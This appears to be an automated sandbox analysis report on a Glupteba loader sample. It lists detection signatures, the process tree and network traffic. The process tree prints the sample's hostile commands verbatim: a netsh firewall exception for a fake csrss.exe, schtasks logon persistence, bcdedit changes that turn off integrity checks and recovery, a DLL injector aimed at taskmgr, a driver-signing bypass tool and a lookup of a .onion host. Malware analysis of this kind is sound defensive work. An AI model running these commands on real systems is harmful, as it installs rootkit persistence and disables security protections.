Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    25-12-2024 14:53

General

  • Target

    JaffaCakes118_d97ac1c36196a41ae4f0e3ee2033a24f67ba5953f210f3d4dd53b5464a6eaf38.exe

  • Size

    4.1MB

  • MD5

    4347d1e8d835af022da5509bf3c17266

  • SHA1

    4ab23c1a468cee9f4059559df3b4d05474076d2e

  • SHA256

    d97ac1c36196a41ae4f0e3ee2033a24f67ba5953f210f3d4dd53b5464a6eaf38

  • SHA512

    8ab13c820c36cb62f425a08a3f7af0d8c88a7aea86653a4c630fa031e00e7516e89f0374797c4249ee061e81fce382d904cc6a05c000ad8bb7d5136020d157d9

  • SSDEEP

    98304:ym00TdmKgb6GMZr9Fbw3WF6/w6nn8ZBybm6pg:jPpmjOUGdyaN

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba family
  • Glupteba payload 20 IoCs
  • Windows security bypass 2 TTPs 7 IoCs
  • Modifies boot configuration data using bcdedit 14 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 13 IoCs
  • Windows security modification 2 TTPs 7 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Manipulates WinMon driver. 1 IoCs

    Roottkits write to WinMon to hide PIDs from being detected.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 3 IoCs
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_d97ac1c36196a41ae4f0e3ee2033a24f67ba5953f210f3d4dd53b5464a6eaf38.exe
    "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_d97ac1c36196a41ae4f0e3ee2033a24f67ba5953f210f3d4dd53b5464a6eaf38.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2228
    • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_d97ac1c36196a41ae4f0e3ee2033a24f67ba5953f210f3d4dd53b5464a6eaf38.exe
      "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_d97ac1c36196a41ae4f0e3ee2033a24f67ba5953f210f3d4dd53b5464a6eaf38.exe"
      2⤵
      • Windows security bypass
      • Loads dropped DLL
      • Windows security modification
      • Adds Run key to start application
      • Checks for VirtualBox DLLs, possible anti-VM trick
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2672
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2740
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          • Modifies data under HKEY_USERS
          PID:2804
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Adds Run key to start application
        • Manipulates WinMon driver.
        • Manipulates WinMonFS driver.
        • System Location Discovery: System Language Discovery
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2620
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:1716
        • C:\Windows\system32\schtasks.exe
          schtasks /delete /tn ScheduledUpdate /f
          4⤵
            PID:2756
          • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
            "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Modifies system certificate store
            • Suspicious use of WriteProcessMemory
            PID:1244
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
              5⤵
              • Modifies boot configuration data using bcdedit
              PID:1488
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
              5⤵
              • Modifies boot configuration data using bcdedit
              PID:648
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
              5⤵
              • Modifies boot configuration data using bcdedit
              PID:944
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
              5⤵
              • Modifies boot configuration data using bcdedit
              PID:852
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
              5⤵
              • Modifies boot configuration data using bcdedit
              PID:1328
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
              5⤵
              • Modifies boot configuration data using bcdedit
              PID:752
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
              5⤵
              • Modifies boot configuration data using bcdedit
              PID:1648
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
              5⤵
              • Modifies boot configuration data using bcdedit
              PID:2500
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
              5⤵
              • Modifies boot configuration data using bcdedit
              PID:2272
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
              5⤵
              • Modifies boot configuration data using bcdedit
              PID:1468
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
              5⤵
              • Modifies boot configuration data using bcdedit
              PID:972
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -timeout 0
              5⤵
              • Modifies boot configuration data using bcdedit
              PID:1940
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
              5⤵
              • Modifies boot configuration data using bcdedit
              PID:2156
          • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
            C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:2116
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\Sysnative\bcdedit.exe /v
            4⤵
            • Modifies boot configuration data using bcdedit
            PID:556
          • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
            C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
            4⤵
            • Executes dropped EXE
            PID:864
          • C:\Windows\system32\schtasks.exe
            schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2188
    • C:\Windows\system32\makecab.exe
      "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241225145336.log C:\Windows\Logs\CBS\CbsPersist_20241225145336.cab
      1⤵
      • Drops file in Windows directory
      PID:2708

    Network

    • flag-us
      DNS
      66e7b432-6c9c-4a4f-b24e-c0458cb199f8.uuid.dg2sz7pxs7llf2t25fsbutlvvrjij4pmojugn75cmxnvoshmju6dzcad.onion
      csrss.exe
      Remote address:
      8.8.8.8:53
      Request
      66e7b432-6c9c-4a4f-b24e-c0458cb199f8.uuid.dg2sz7pxs7llf2t25fsbutlvvrjij4pmojugn75cmxnvoshmju6dzcad.onion
      IN TXT
      Response
    • flag-us
      DNS
      msdl.microsoft.com
      patch.exe
      Remote address:
      8.8.8.8:53
      Request
      msdl.microsoft.com
      IN A
      Response
      msdl.microsoft.com
      IN CNAME
      msdl.microsoft.akadns.net
      msdl.microsoft.akadns.net
      IN CNAME
      msdl-microsoft-com.a-0016.a-msedge.net
      msdl-microsoft-com.a-0016.a-msedge.net
      IN CNAME
      a-0016.a-msedge.net
      a-0016.a-msedge.net
      IN A
      204.79.197.219
    • flag-us
      GET
      https://msdl.microsoft.com/download/symbols/index2.txt
      patch.exe
      Remote address:
      204.79.197.219:443
      Request
      GET /download/symbols/index2.txt HTTP/1.1
      Accept-Encoding: gzip
      User-Agent: Microsoft-Symbol-Server/10.0.10586.567
      Host: msdl.microsoft.com
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 404 Not Found
      X-Cache: TCP_MISS
      Strict-Transport-Security: includeSubDomains
      X-MSEdge-Ref: Ref A: C728C45AE7074F7AB553D4C6BB89E3B5 Ref B: LON04EDGE0814 Ref C: 2024-12-25T14:53:52Z
      Date: Wed, 25 Dec 2024 14:53:52 GMT
      Content-Length: 0
    • flag-us
      GET
      https://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb
      patch.exe
      Remote address:
      204.79.197.219:443
      Request
      GET /download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb HTTP/1.1
      Accept-Encoding: gzip
      User-Agent: Microsoft-Symbol-Server/10.0.10586.567
      Host: msdl.microsoft.com
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 302 Found
      Location: https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=f1ii7NDyMbksXg6lvH9tIndZisxMIjWfIx0Gt4whJrY%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T12%3A05%3A05Z&ske=2024-12-27T13%3A05%3A05Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A19%3A29Z&sp=r&rscl=x-e2eid-f25dc17f-f3ec45b2-8ada7075-3285e531-session-205ff6fb-1edd4d75-ae8582df-ede12da0
      X-Cache: TCP_MISS
      Strict-Transport-Security: includeSubDomains
      X-MSEdge-Ref: Ref A: 4B45FB80BF29412F917EA06390442201 Ref B: LON04EDGE0814 Ref C: 2024-12-25T14:53:52Z
      Date: Wed, 25 Dec 2024 14:53:52 GMT
      Content-Length: 0
    • flag-us
      GET
      https://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb
      patch.exe
      Remote address:
      204.79.197.219:443
      Request
      GET /download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb HTTP/1.1
      Accept-Encoding: gzip
      User-Agent: Microsoft-Symbol-Server/10.0.10586.567
      Host: msdl.microsoft.com
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 302 Found
      Location: https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=f1ii7NDyMbksXg6lvH9tIndZisxMIjWfIx0Gt4whJrY%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T12%3A05%3A05Z&ske=2024-12-27T13%3A05%3A05Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A19%3A29Z&sp=r&rscl=x-e2eid-f25dc17f-f3ec45b2-8ada7075-3285e531-session-205ff6fb-1edd4d75-ae8582df-ede12da0
      X-Cache: TCP_HIT
      Strict-Transport-Security: includeSubDomains
      X-MSEdge-Ref: Ref A: 6D7D9DA090B94FAB88A7FB18C1313B4E Ref B: LON04EDGE0814 Ref C: 2024-12-25T14:54:02Z
      Date: Wed, 25 Dec 2024 14:54:02 GMT
      Content-Length: 0
    • flag-us
      GET
      https://msdl.microsoft.com/download/symbols/index2.txt
      patch.exe
      Remote address:
      204.79.197.219:443
      Request
      GET /download/symbols/index2.txt HTTP/1.1
      Accept-Encoding: gzip
      User-Agent: Microsoft-Symbol-Server/10.0.10586.567
      Host: msdl.microsoft.com
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 404 Not Found
      X-Cache: TCP_HIT
      Strict-Transport-Security: includeSubDomains
      X-MSEdge-Ref: Ref A: 21AAB382768F4D40A12C763CF4119AB7 Ref B: LON04EDGE0814 Ref C: 2024-12-25T14:54:14Z
      Date: Wed, 25 Dec 2024 14:54:13 GMT
      Content-Length: 0
    • flag-us
      GET
      https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb
      patch.exe
      Remote address:
      204.79.197.219:443
      Request
      GET /download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb HTTP/1.1
      Accept-Encoding: gzip
      User-Agent: Microsoft-Symbol-Server/10.0.10586.567
      Host: msdl.microsoft.com
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 302 Found
      Location: https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=4oBr6COqQ1%2FRoPO8nTNyv01vSA5i9dELuorMq1OT9b0%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T10%3A06%3A11Z&ske=2024-12-27T11%3A06%3A11Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A04%3A39Z&sp=r&rscl=x-e2eid-082bd611-87614cfd-bbeafdff-21d73f3a-session-51f2194f-7e7a409e-ace650d5-c9cb9b59
      X-Cache: TCP_MISS
      Strict-Transport-Security: includeSubDomains
      X-MSEdge-Ref: Ref A: 4012AB27DFFF49448EE9FC7CD4A37A66 Ref B: LON04EDGE0814 Ref C: 2024-12-25T14:54:14Z
      Date: Wed, 25 Dec 2024 14:54:14 GMT
      Content-Length: 0
    • flag-us
      GET
      https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb
      patch.exe
      Remote address:
      204.79.197.219:443
      Request
      GET /download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb HTTP/1.1
      Accept-Encoding: gzip
      User-Agent: Microsoft-Symbol-Server/10.0.10586.567
      Host: msdl.microsoft.com
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 302 Found
      Location: https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=4oBr6COqQ1%2FRoPO8nTNyv01vSA5i9dELuorMq1OT9b0%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T10%3A06%3A11Z&ske=2024-12-27T11%3A06%3A11Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A04%3A39Z&sp=r&rscl=x-e2eid-082bd611-87614cfd-bbeafdff-21d73f3a-session-51f2194f-7e7a409e-ace650d5-c9cb9b59
      X-Cache: TCP_HIT
      Strict-Transport-Security: includeSubDomains
      X-MSEdge-Ref: Ref A: 7BDB70401E724A9F88D2AB4546F50D69 Ref B: LON04EDGE0814 Ref C: 2024-12-25T14:54:15Z
      Date: Wed, 25 Dec 2024 14:54:15 GMT
      Content-Length: 0
    • flag-us
      DNS
      vsblobprodscussu5shard30.blob.core.windows.net
      patch.exe
      Remote address:
      8.8.8.8:53
      Request
      vsblobprodscussu5shard30.blob.core.windows.net
      IN A
      Response
      vsblobprodscussu5shard30.blob.core.windows.net
      IN CNAME
      blob.sat09prdstrz08a.store.core.windows.net
      blob.sat09prdstrz08a.store.core.windows.net
      IN CNAME
      blob.sat09prdstrz08a.trafficmanager.net
      blob.sat09prdstrz08a.trafficmanager.net
      IN A
      20.150.70.36
      blob.sat09prdstrz08a.trafficmanager.net
      IN A
      20.150.79.68
      blob.sat09prdstrz08a.trafficmanager.net
      IN A
      20.150.38.228
    • flag-us
      GET
      https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=f1ii7NDyMbksXg6lvH9tIndZisxMIjWfIx0Gt4whJrY%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T12%3A05%3A05Z&ske=2024-12-27T13%3A05%3A05Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A19%3A29Z&sp=r&rscl=x-e2eid-f25dc17f-f3ec45b2-8ada7075-3285e531-session-205ff6fb-1edd4d75-ae8582df-ede12da0
      patch.exe
      Remote address:
      20.150.70.36:443
      Request
      GET /b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=f1ii7NDyMbksXg6lvH9tIndZisxMIjWfIx0Gt4whJrY%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T12%3A05%3A05Z&ske=2024-12-27T13%3A05%3A05Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A19%3A29Z&sp=r&rscl=x-e2eid-f25dc17f-f3ec45b2-8ada7075-3285e531-session-205ff6fb-1edd4d75-ae8582df-ede12da0 HTTP/1.1
      Accept-Encoding: gzip
      User-Agent: Microsoft-Symbol-Server/10.0.10586.567
      Connection: Keep-Alive
      Cache-Control: no-cache
      Host: vsblobprodscussu5shard30.blob.core.windows.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 8752128
      Content-Type: application/octet-stream
      Content-Language: x-e2eid-f25dc17f-f3ec45b2-8ada7075-3285e531-session-205ff6fb-1edd4d75-ae8582df-ede12da0
      Last-Modified: Mon, 12 Jun 2017 21:34:21 GMT
      Accept-Ranges: bytes
      ETag: "0x8D4B1DACA398C54"
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 7461382c-001e-003d-58dc-5659b4000000
      x-ms-version: 2019-07-07
      x-ms-creation-time: Fri, 05 May 2017 08:24:14 GMT
      x-ms-lease-status: unlocked
      x-ms-lease-state: available
      x-ms-blob-type: BlockBlob
      x-ms-server-encrypted: true
      Access-Control-Expose-Headers: Content-Length
      Access-Control-Allow-Origin: *
      Date: Wed, 25 Dec 2024 14:53:53 GMT
    • flag-us
      GET
      https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=f1ii7NDyMbksXg6lvH9tIndZisxMIjWfIx0Gt4whJrY%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T12%3A05%3A05Z&ske=2024-12-27T13%3A05%3A05Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A19%3A29Z&sp=r&rscl=x-e2eid-f25dc17f-f3ec45b2-8ada7075-3285e531-session-205ff6fb-1edd4d75-ae8582df-ede12da0
      patch.exe
      Remote address:
      20.150.70.36:443
      Request
      GET /b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=f1ii7NDyMbksXg6lvH9tIndZisxMIjWfIx0Gt4whJrY%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T12%3A05%3A05Z&ske=2024-12-27T13%3A05%3A05Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A19%3A29Z&sp=r&rscl=x-e2eid-f25dc17f-f3ec45b2-8ada7075-3285e531-session-205ff6fb-1edd4d75-ae8582df-ede12da0 HTTP/1.1
      Accept-Encoding: gzip
      User-Agent: Microsoft-Symbol-Server/10.0.10586.567
      Connection: Keep-Alive
      Cache-Control: no-cache
      Host: vsblobprodscussu5shard30.blob.core.windows.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 8752128
      Content-Type: application/octet-stream
      Content-Language: x-e2eid-f25dc17f-f3ec45b2-8ada7075-3285e531-session-205ff6fb-1edd4d75-ae8582df-ede12da0
      Last-Modified: Mon, 12 Jun 2017 21:34:21 GMT
      Accept-Ranges: bytes
      ETag: "0x8D4B1DACA398C54"
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 74614843-001e-003d-31dc-5659b4000000
      x-ms-version: 2019-07-07
      x-ms-creation-time: Fri, 05 May 2017 08:24:14 GMT
      x-ms-lease-status: unlocked
      x-ms-lease-state: available
      x-ms-blob-type: BlockBlob
      x-ms-server-encrypted: true
      Access-Control-Expose-Headers: Content-Length
      Access-Control-Allow-Origin: *
      Date: Wed, 25 Dec 2024 14:54:02 GMT
    • flag-us
      DNS
      vsblobprodscussu5shard20.blob.core.windows.net
      patch.exe
      Remote address:
      8.8.8.8:53
      Request
      vsblobprodscussu5shard20.blob.core.windows.net
      IN A
      Response
      vsblobprodscussu5shard20.blob.core.windows.net
      IN CNAME
      blob.sat09prdstrz08a.store.core.windows.net
      blob.sat09prdstrz08a.store.core.windows.net
      IN CNAME
      blob.sat09prdstrz08a.trafficmanager.net
      blob.sat09prdstrz08a.trafficmanager.net
      IN A
      20.150.38.228
      blob.sat09prdstrz08a.trafficmanager.net
      IN A
      20.150.79.68
      blob.sat09prdstrz08a.trafficmanager.net
      IN A
      20.150.70.36
    • flag-us
      GET
      https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=4oBr6COqQ1%2FRoPO8nTNyv01vSA5i9dELuorMq1OT9b0%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T10%3A06%3A11Z&ske=2024-12-27T11%3A06%3A11Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A04%3A39Z&sp=r&rscl=x-e2eid-082bd611-87614cfd-bbeafdff-21d73f3a-session-51f2194f-7e7a409e-ace650d5-c9cb9b59
      patch.exe
      Remote address:
      20.150.38.228:443
      Request
      GET /b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=4oBr6COqQ1%2FRoPO8nTNyv01vSA5i9dELuorMq1OT9b0%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T10%3A06%3A11Z&ske=2024-12-27T11%3A06%3A11Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A04%3A39Z&sp=r&rscl=x-e2eid-082bd611-87614cfd-bbeafdff-21d73f3a-session-51f2194f-7e7a409e-ace650d5-c9cb9b59 HTTP/1.1
      Accept-Encoding: gzip
      User-Agent: Microsoft-Symbol-Server/10.0.10586.567
      Connection: Keep-Alive
      Cache-Control: no-cache
      Host: vsblobprodscussu5shard20.blob.core.windows.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 503808
      Content-Type: application/octet-stream
      Content-Language: x-e2eid-082bd611-87614cfd-bbeafdff-21d73f3a-session-51f2194f-7e7a409e-ace650d5-c9cb9b59
      Last-Modified: Fri, 02 Feb 2024 04:23:06 GMT
      Accept-Ranges: bytes
      ETag: "0x8DC23A6A7A80D5E"
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: ec9fd06e-f01e-007c-54dc-5678f7000000
      x-ms-version: 2019-07-07
      x-ms-creation-time: Fri, 02 Feb 2024 04:23:06 GMT
      x-ms-lease-status: unlocked
      x-ms-lease-state: available
      x-ms-blob-type: BlockBlob
      x-ms-server-encrypted: true
      Access-Control-Expose-Headers: Content-Length
      Access-Control-Allow-Origin: *
      Date: Wed, 25 Dec 2024 14:54:14 GMT
    • flag-us
      GET
      https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=4oBr6COqQ1%2FRoPO8nTNyv01vSA5i9dELuorMq1OT9b0%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T10%3A06%3A11Z&ske=2024-12-27T11%3A06%3A11Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A04%3A39Z&sp=r&rscl=x-e2eid-082bd611-87614cfd-bbeafdff-21d73f3a-session-51f2194f-7e7a409e-ace650d5-c9cb9b59
      patch.exe
      Remote address:
      20.150.38.228:443
      Request
      GET /b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=4oBr6COqQ1%2FRoPO8nTNyv01vSA5i9dELuorMq1OT9b0%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T10%3A06%3A11Z&ske=2024-12-27T11%3A06%3A11Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A04%3A39Z&sp=r&rscl=x-e2eid-082bd611-87614cfd-bbeafdff-21d73f3a-session-51f2194f-7e7a409e-ace650d5-c9cb9b59 HTTP/1.1
      Accept-Encoding: gzip
      User-Agent: Microsoft-Symbol-Server/10.0.10586.567
      Connection: Keep-Alive
      Cache-Control: no-cache
      Host: vsblobprodscussu5shard20.blob.core.windows.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 503808
      Content-Type: application/octet-stream
      Content-Language: x-e2eid-082bd611-87614cfd-bbeafdff-21d73f3a-session-51f2194f-7e7a409e-ace650d5-c9cb9b59
      Last-Modified: Fri, 02 Feb 2024 04:23:06 GMT
      Accept-Ranges: bytes
      ETag: "0x8DC23A6A7A80D5E"
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: ec9fd270-f01e-007c-26dc-5678f7000000
      x-ms-version: 2019-07-07
      x-ms-creation-time: Fri, 02 Feb 2024 04:23:06 GMT
      x-ms-lease-status: unlocked
      x-ms-lease-state: available
      x-ms-blob-type: BlockBlob
      x-ms-server-encrypted: true
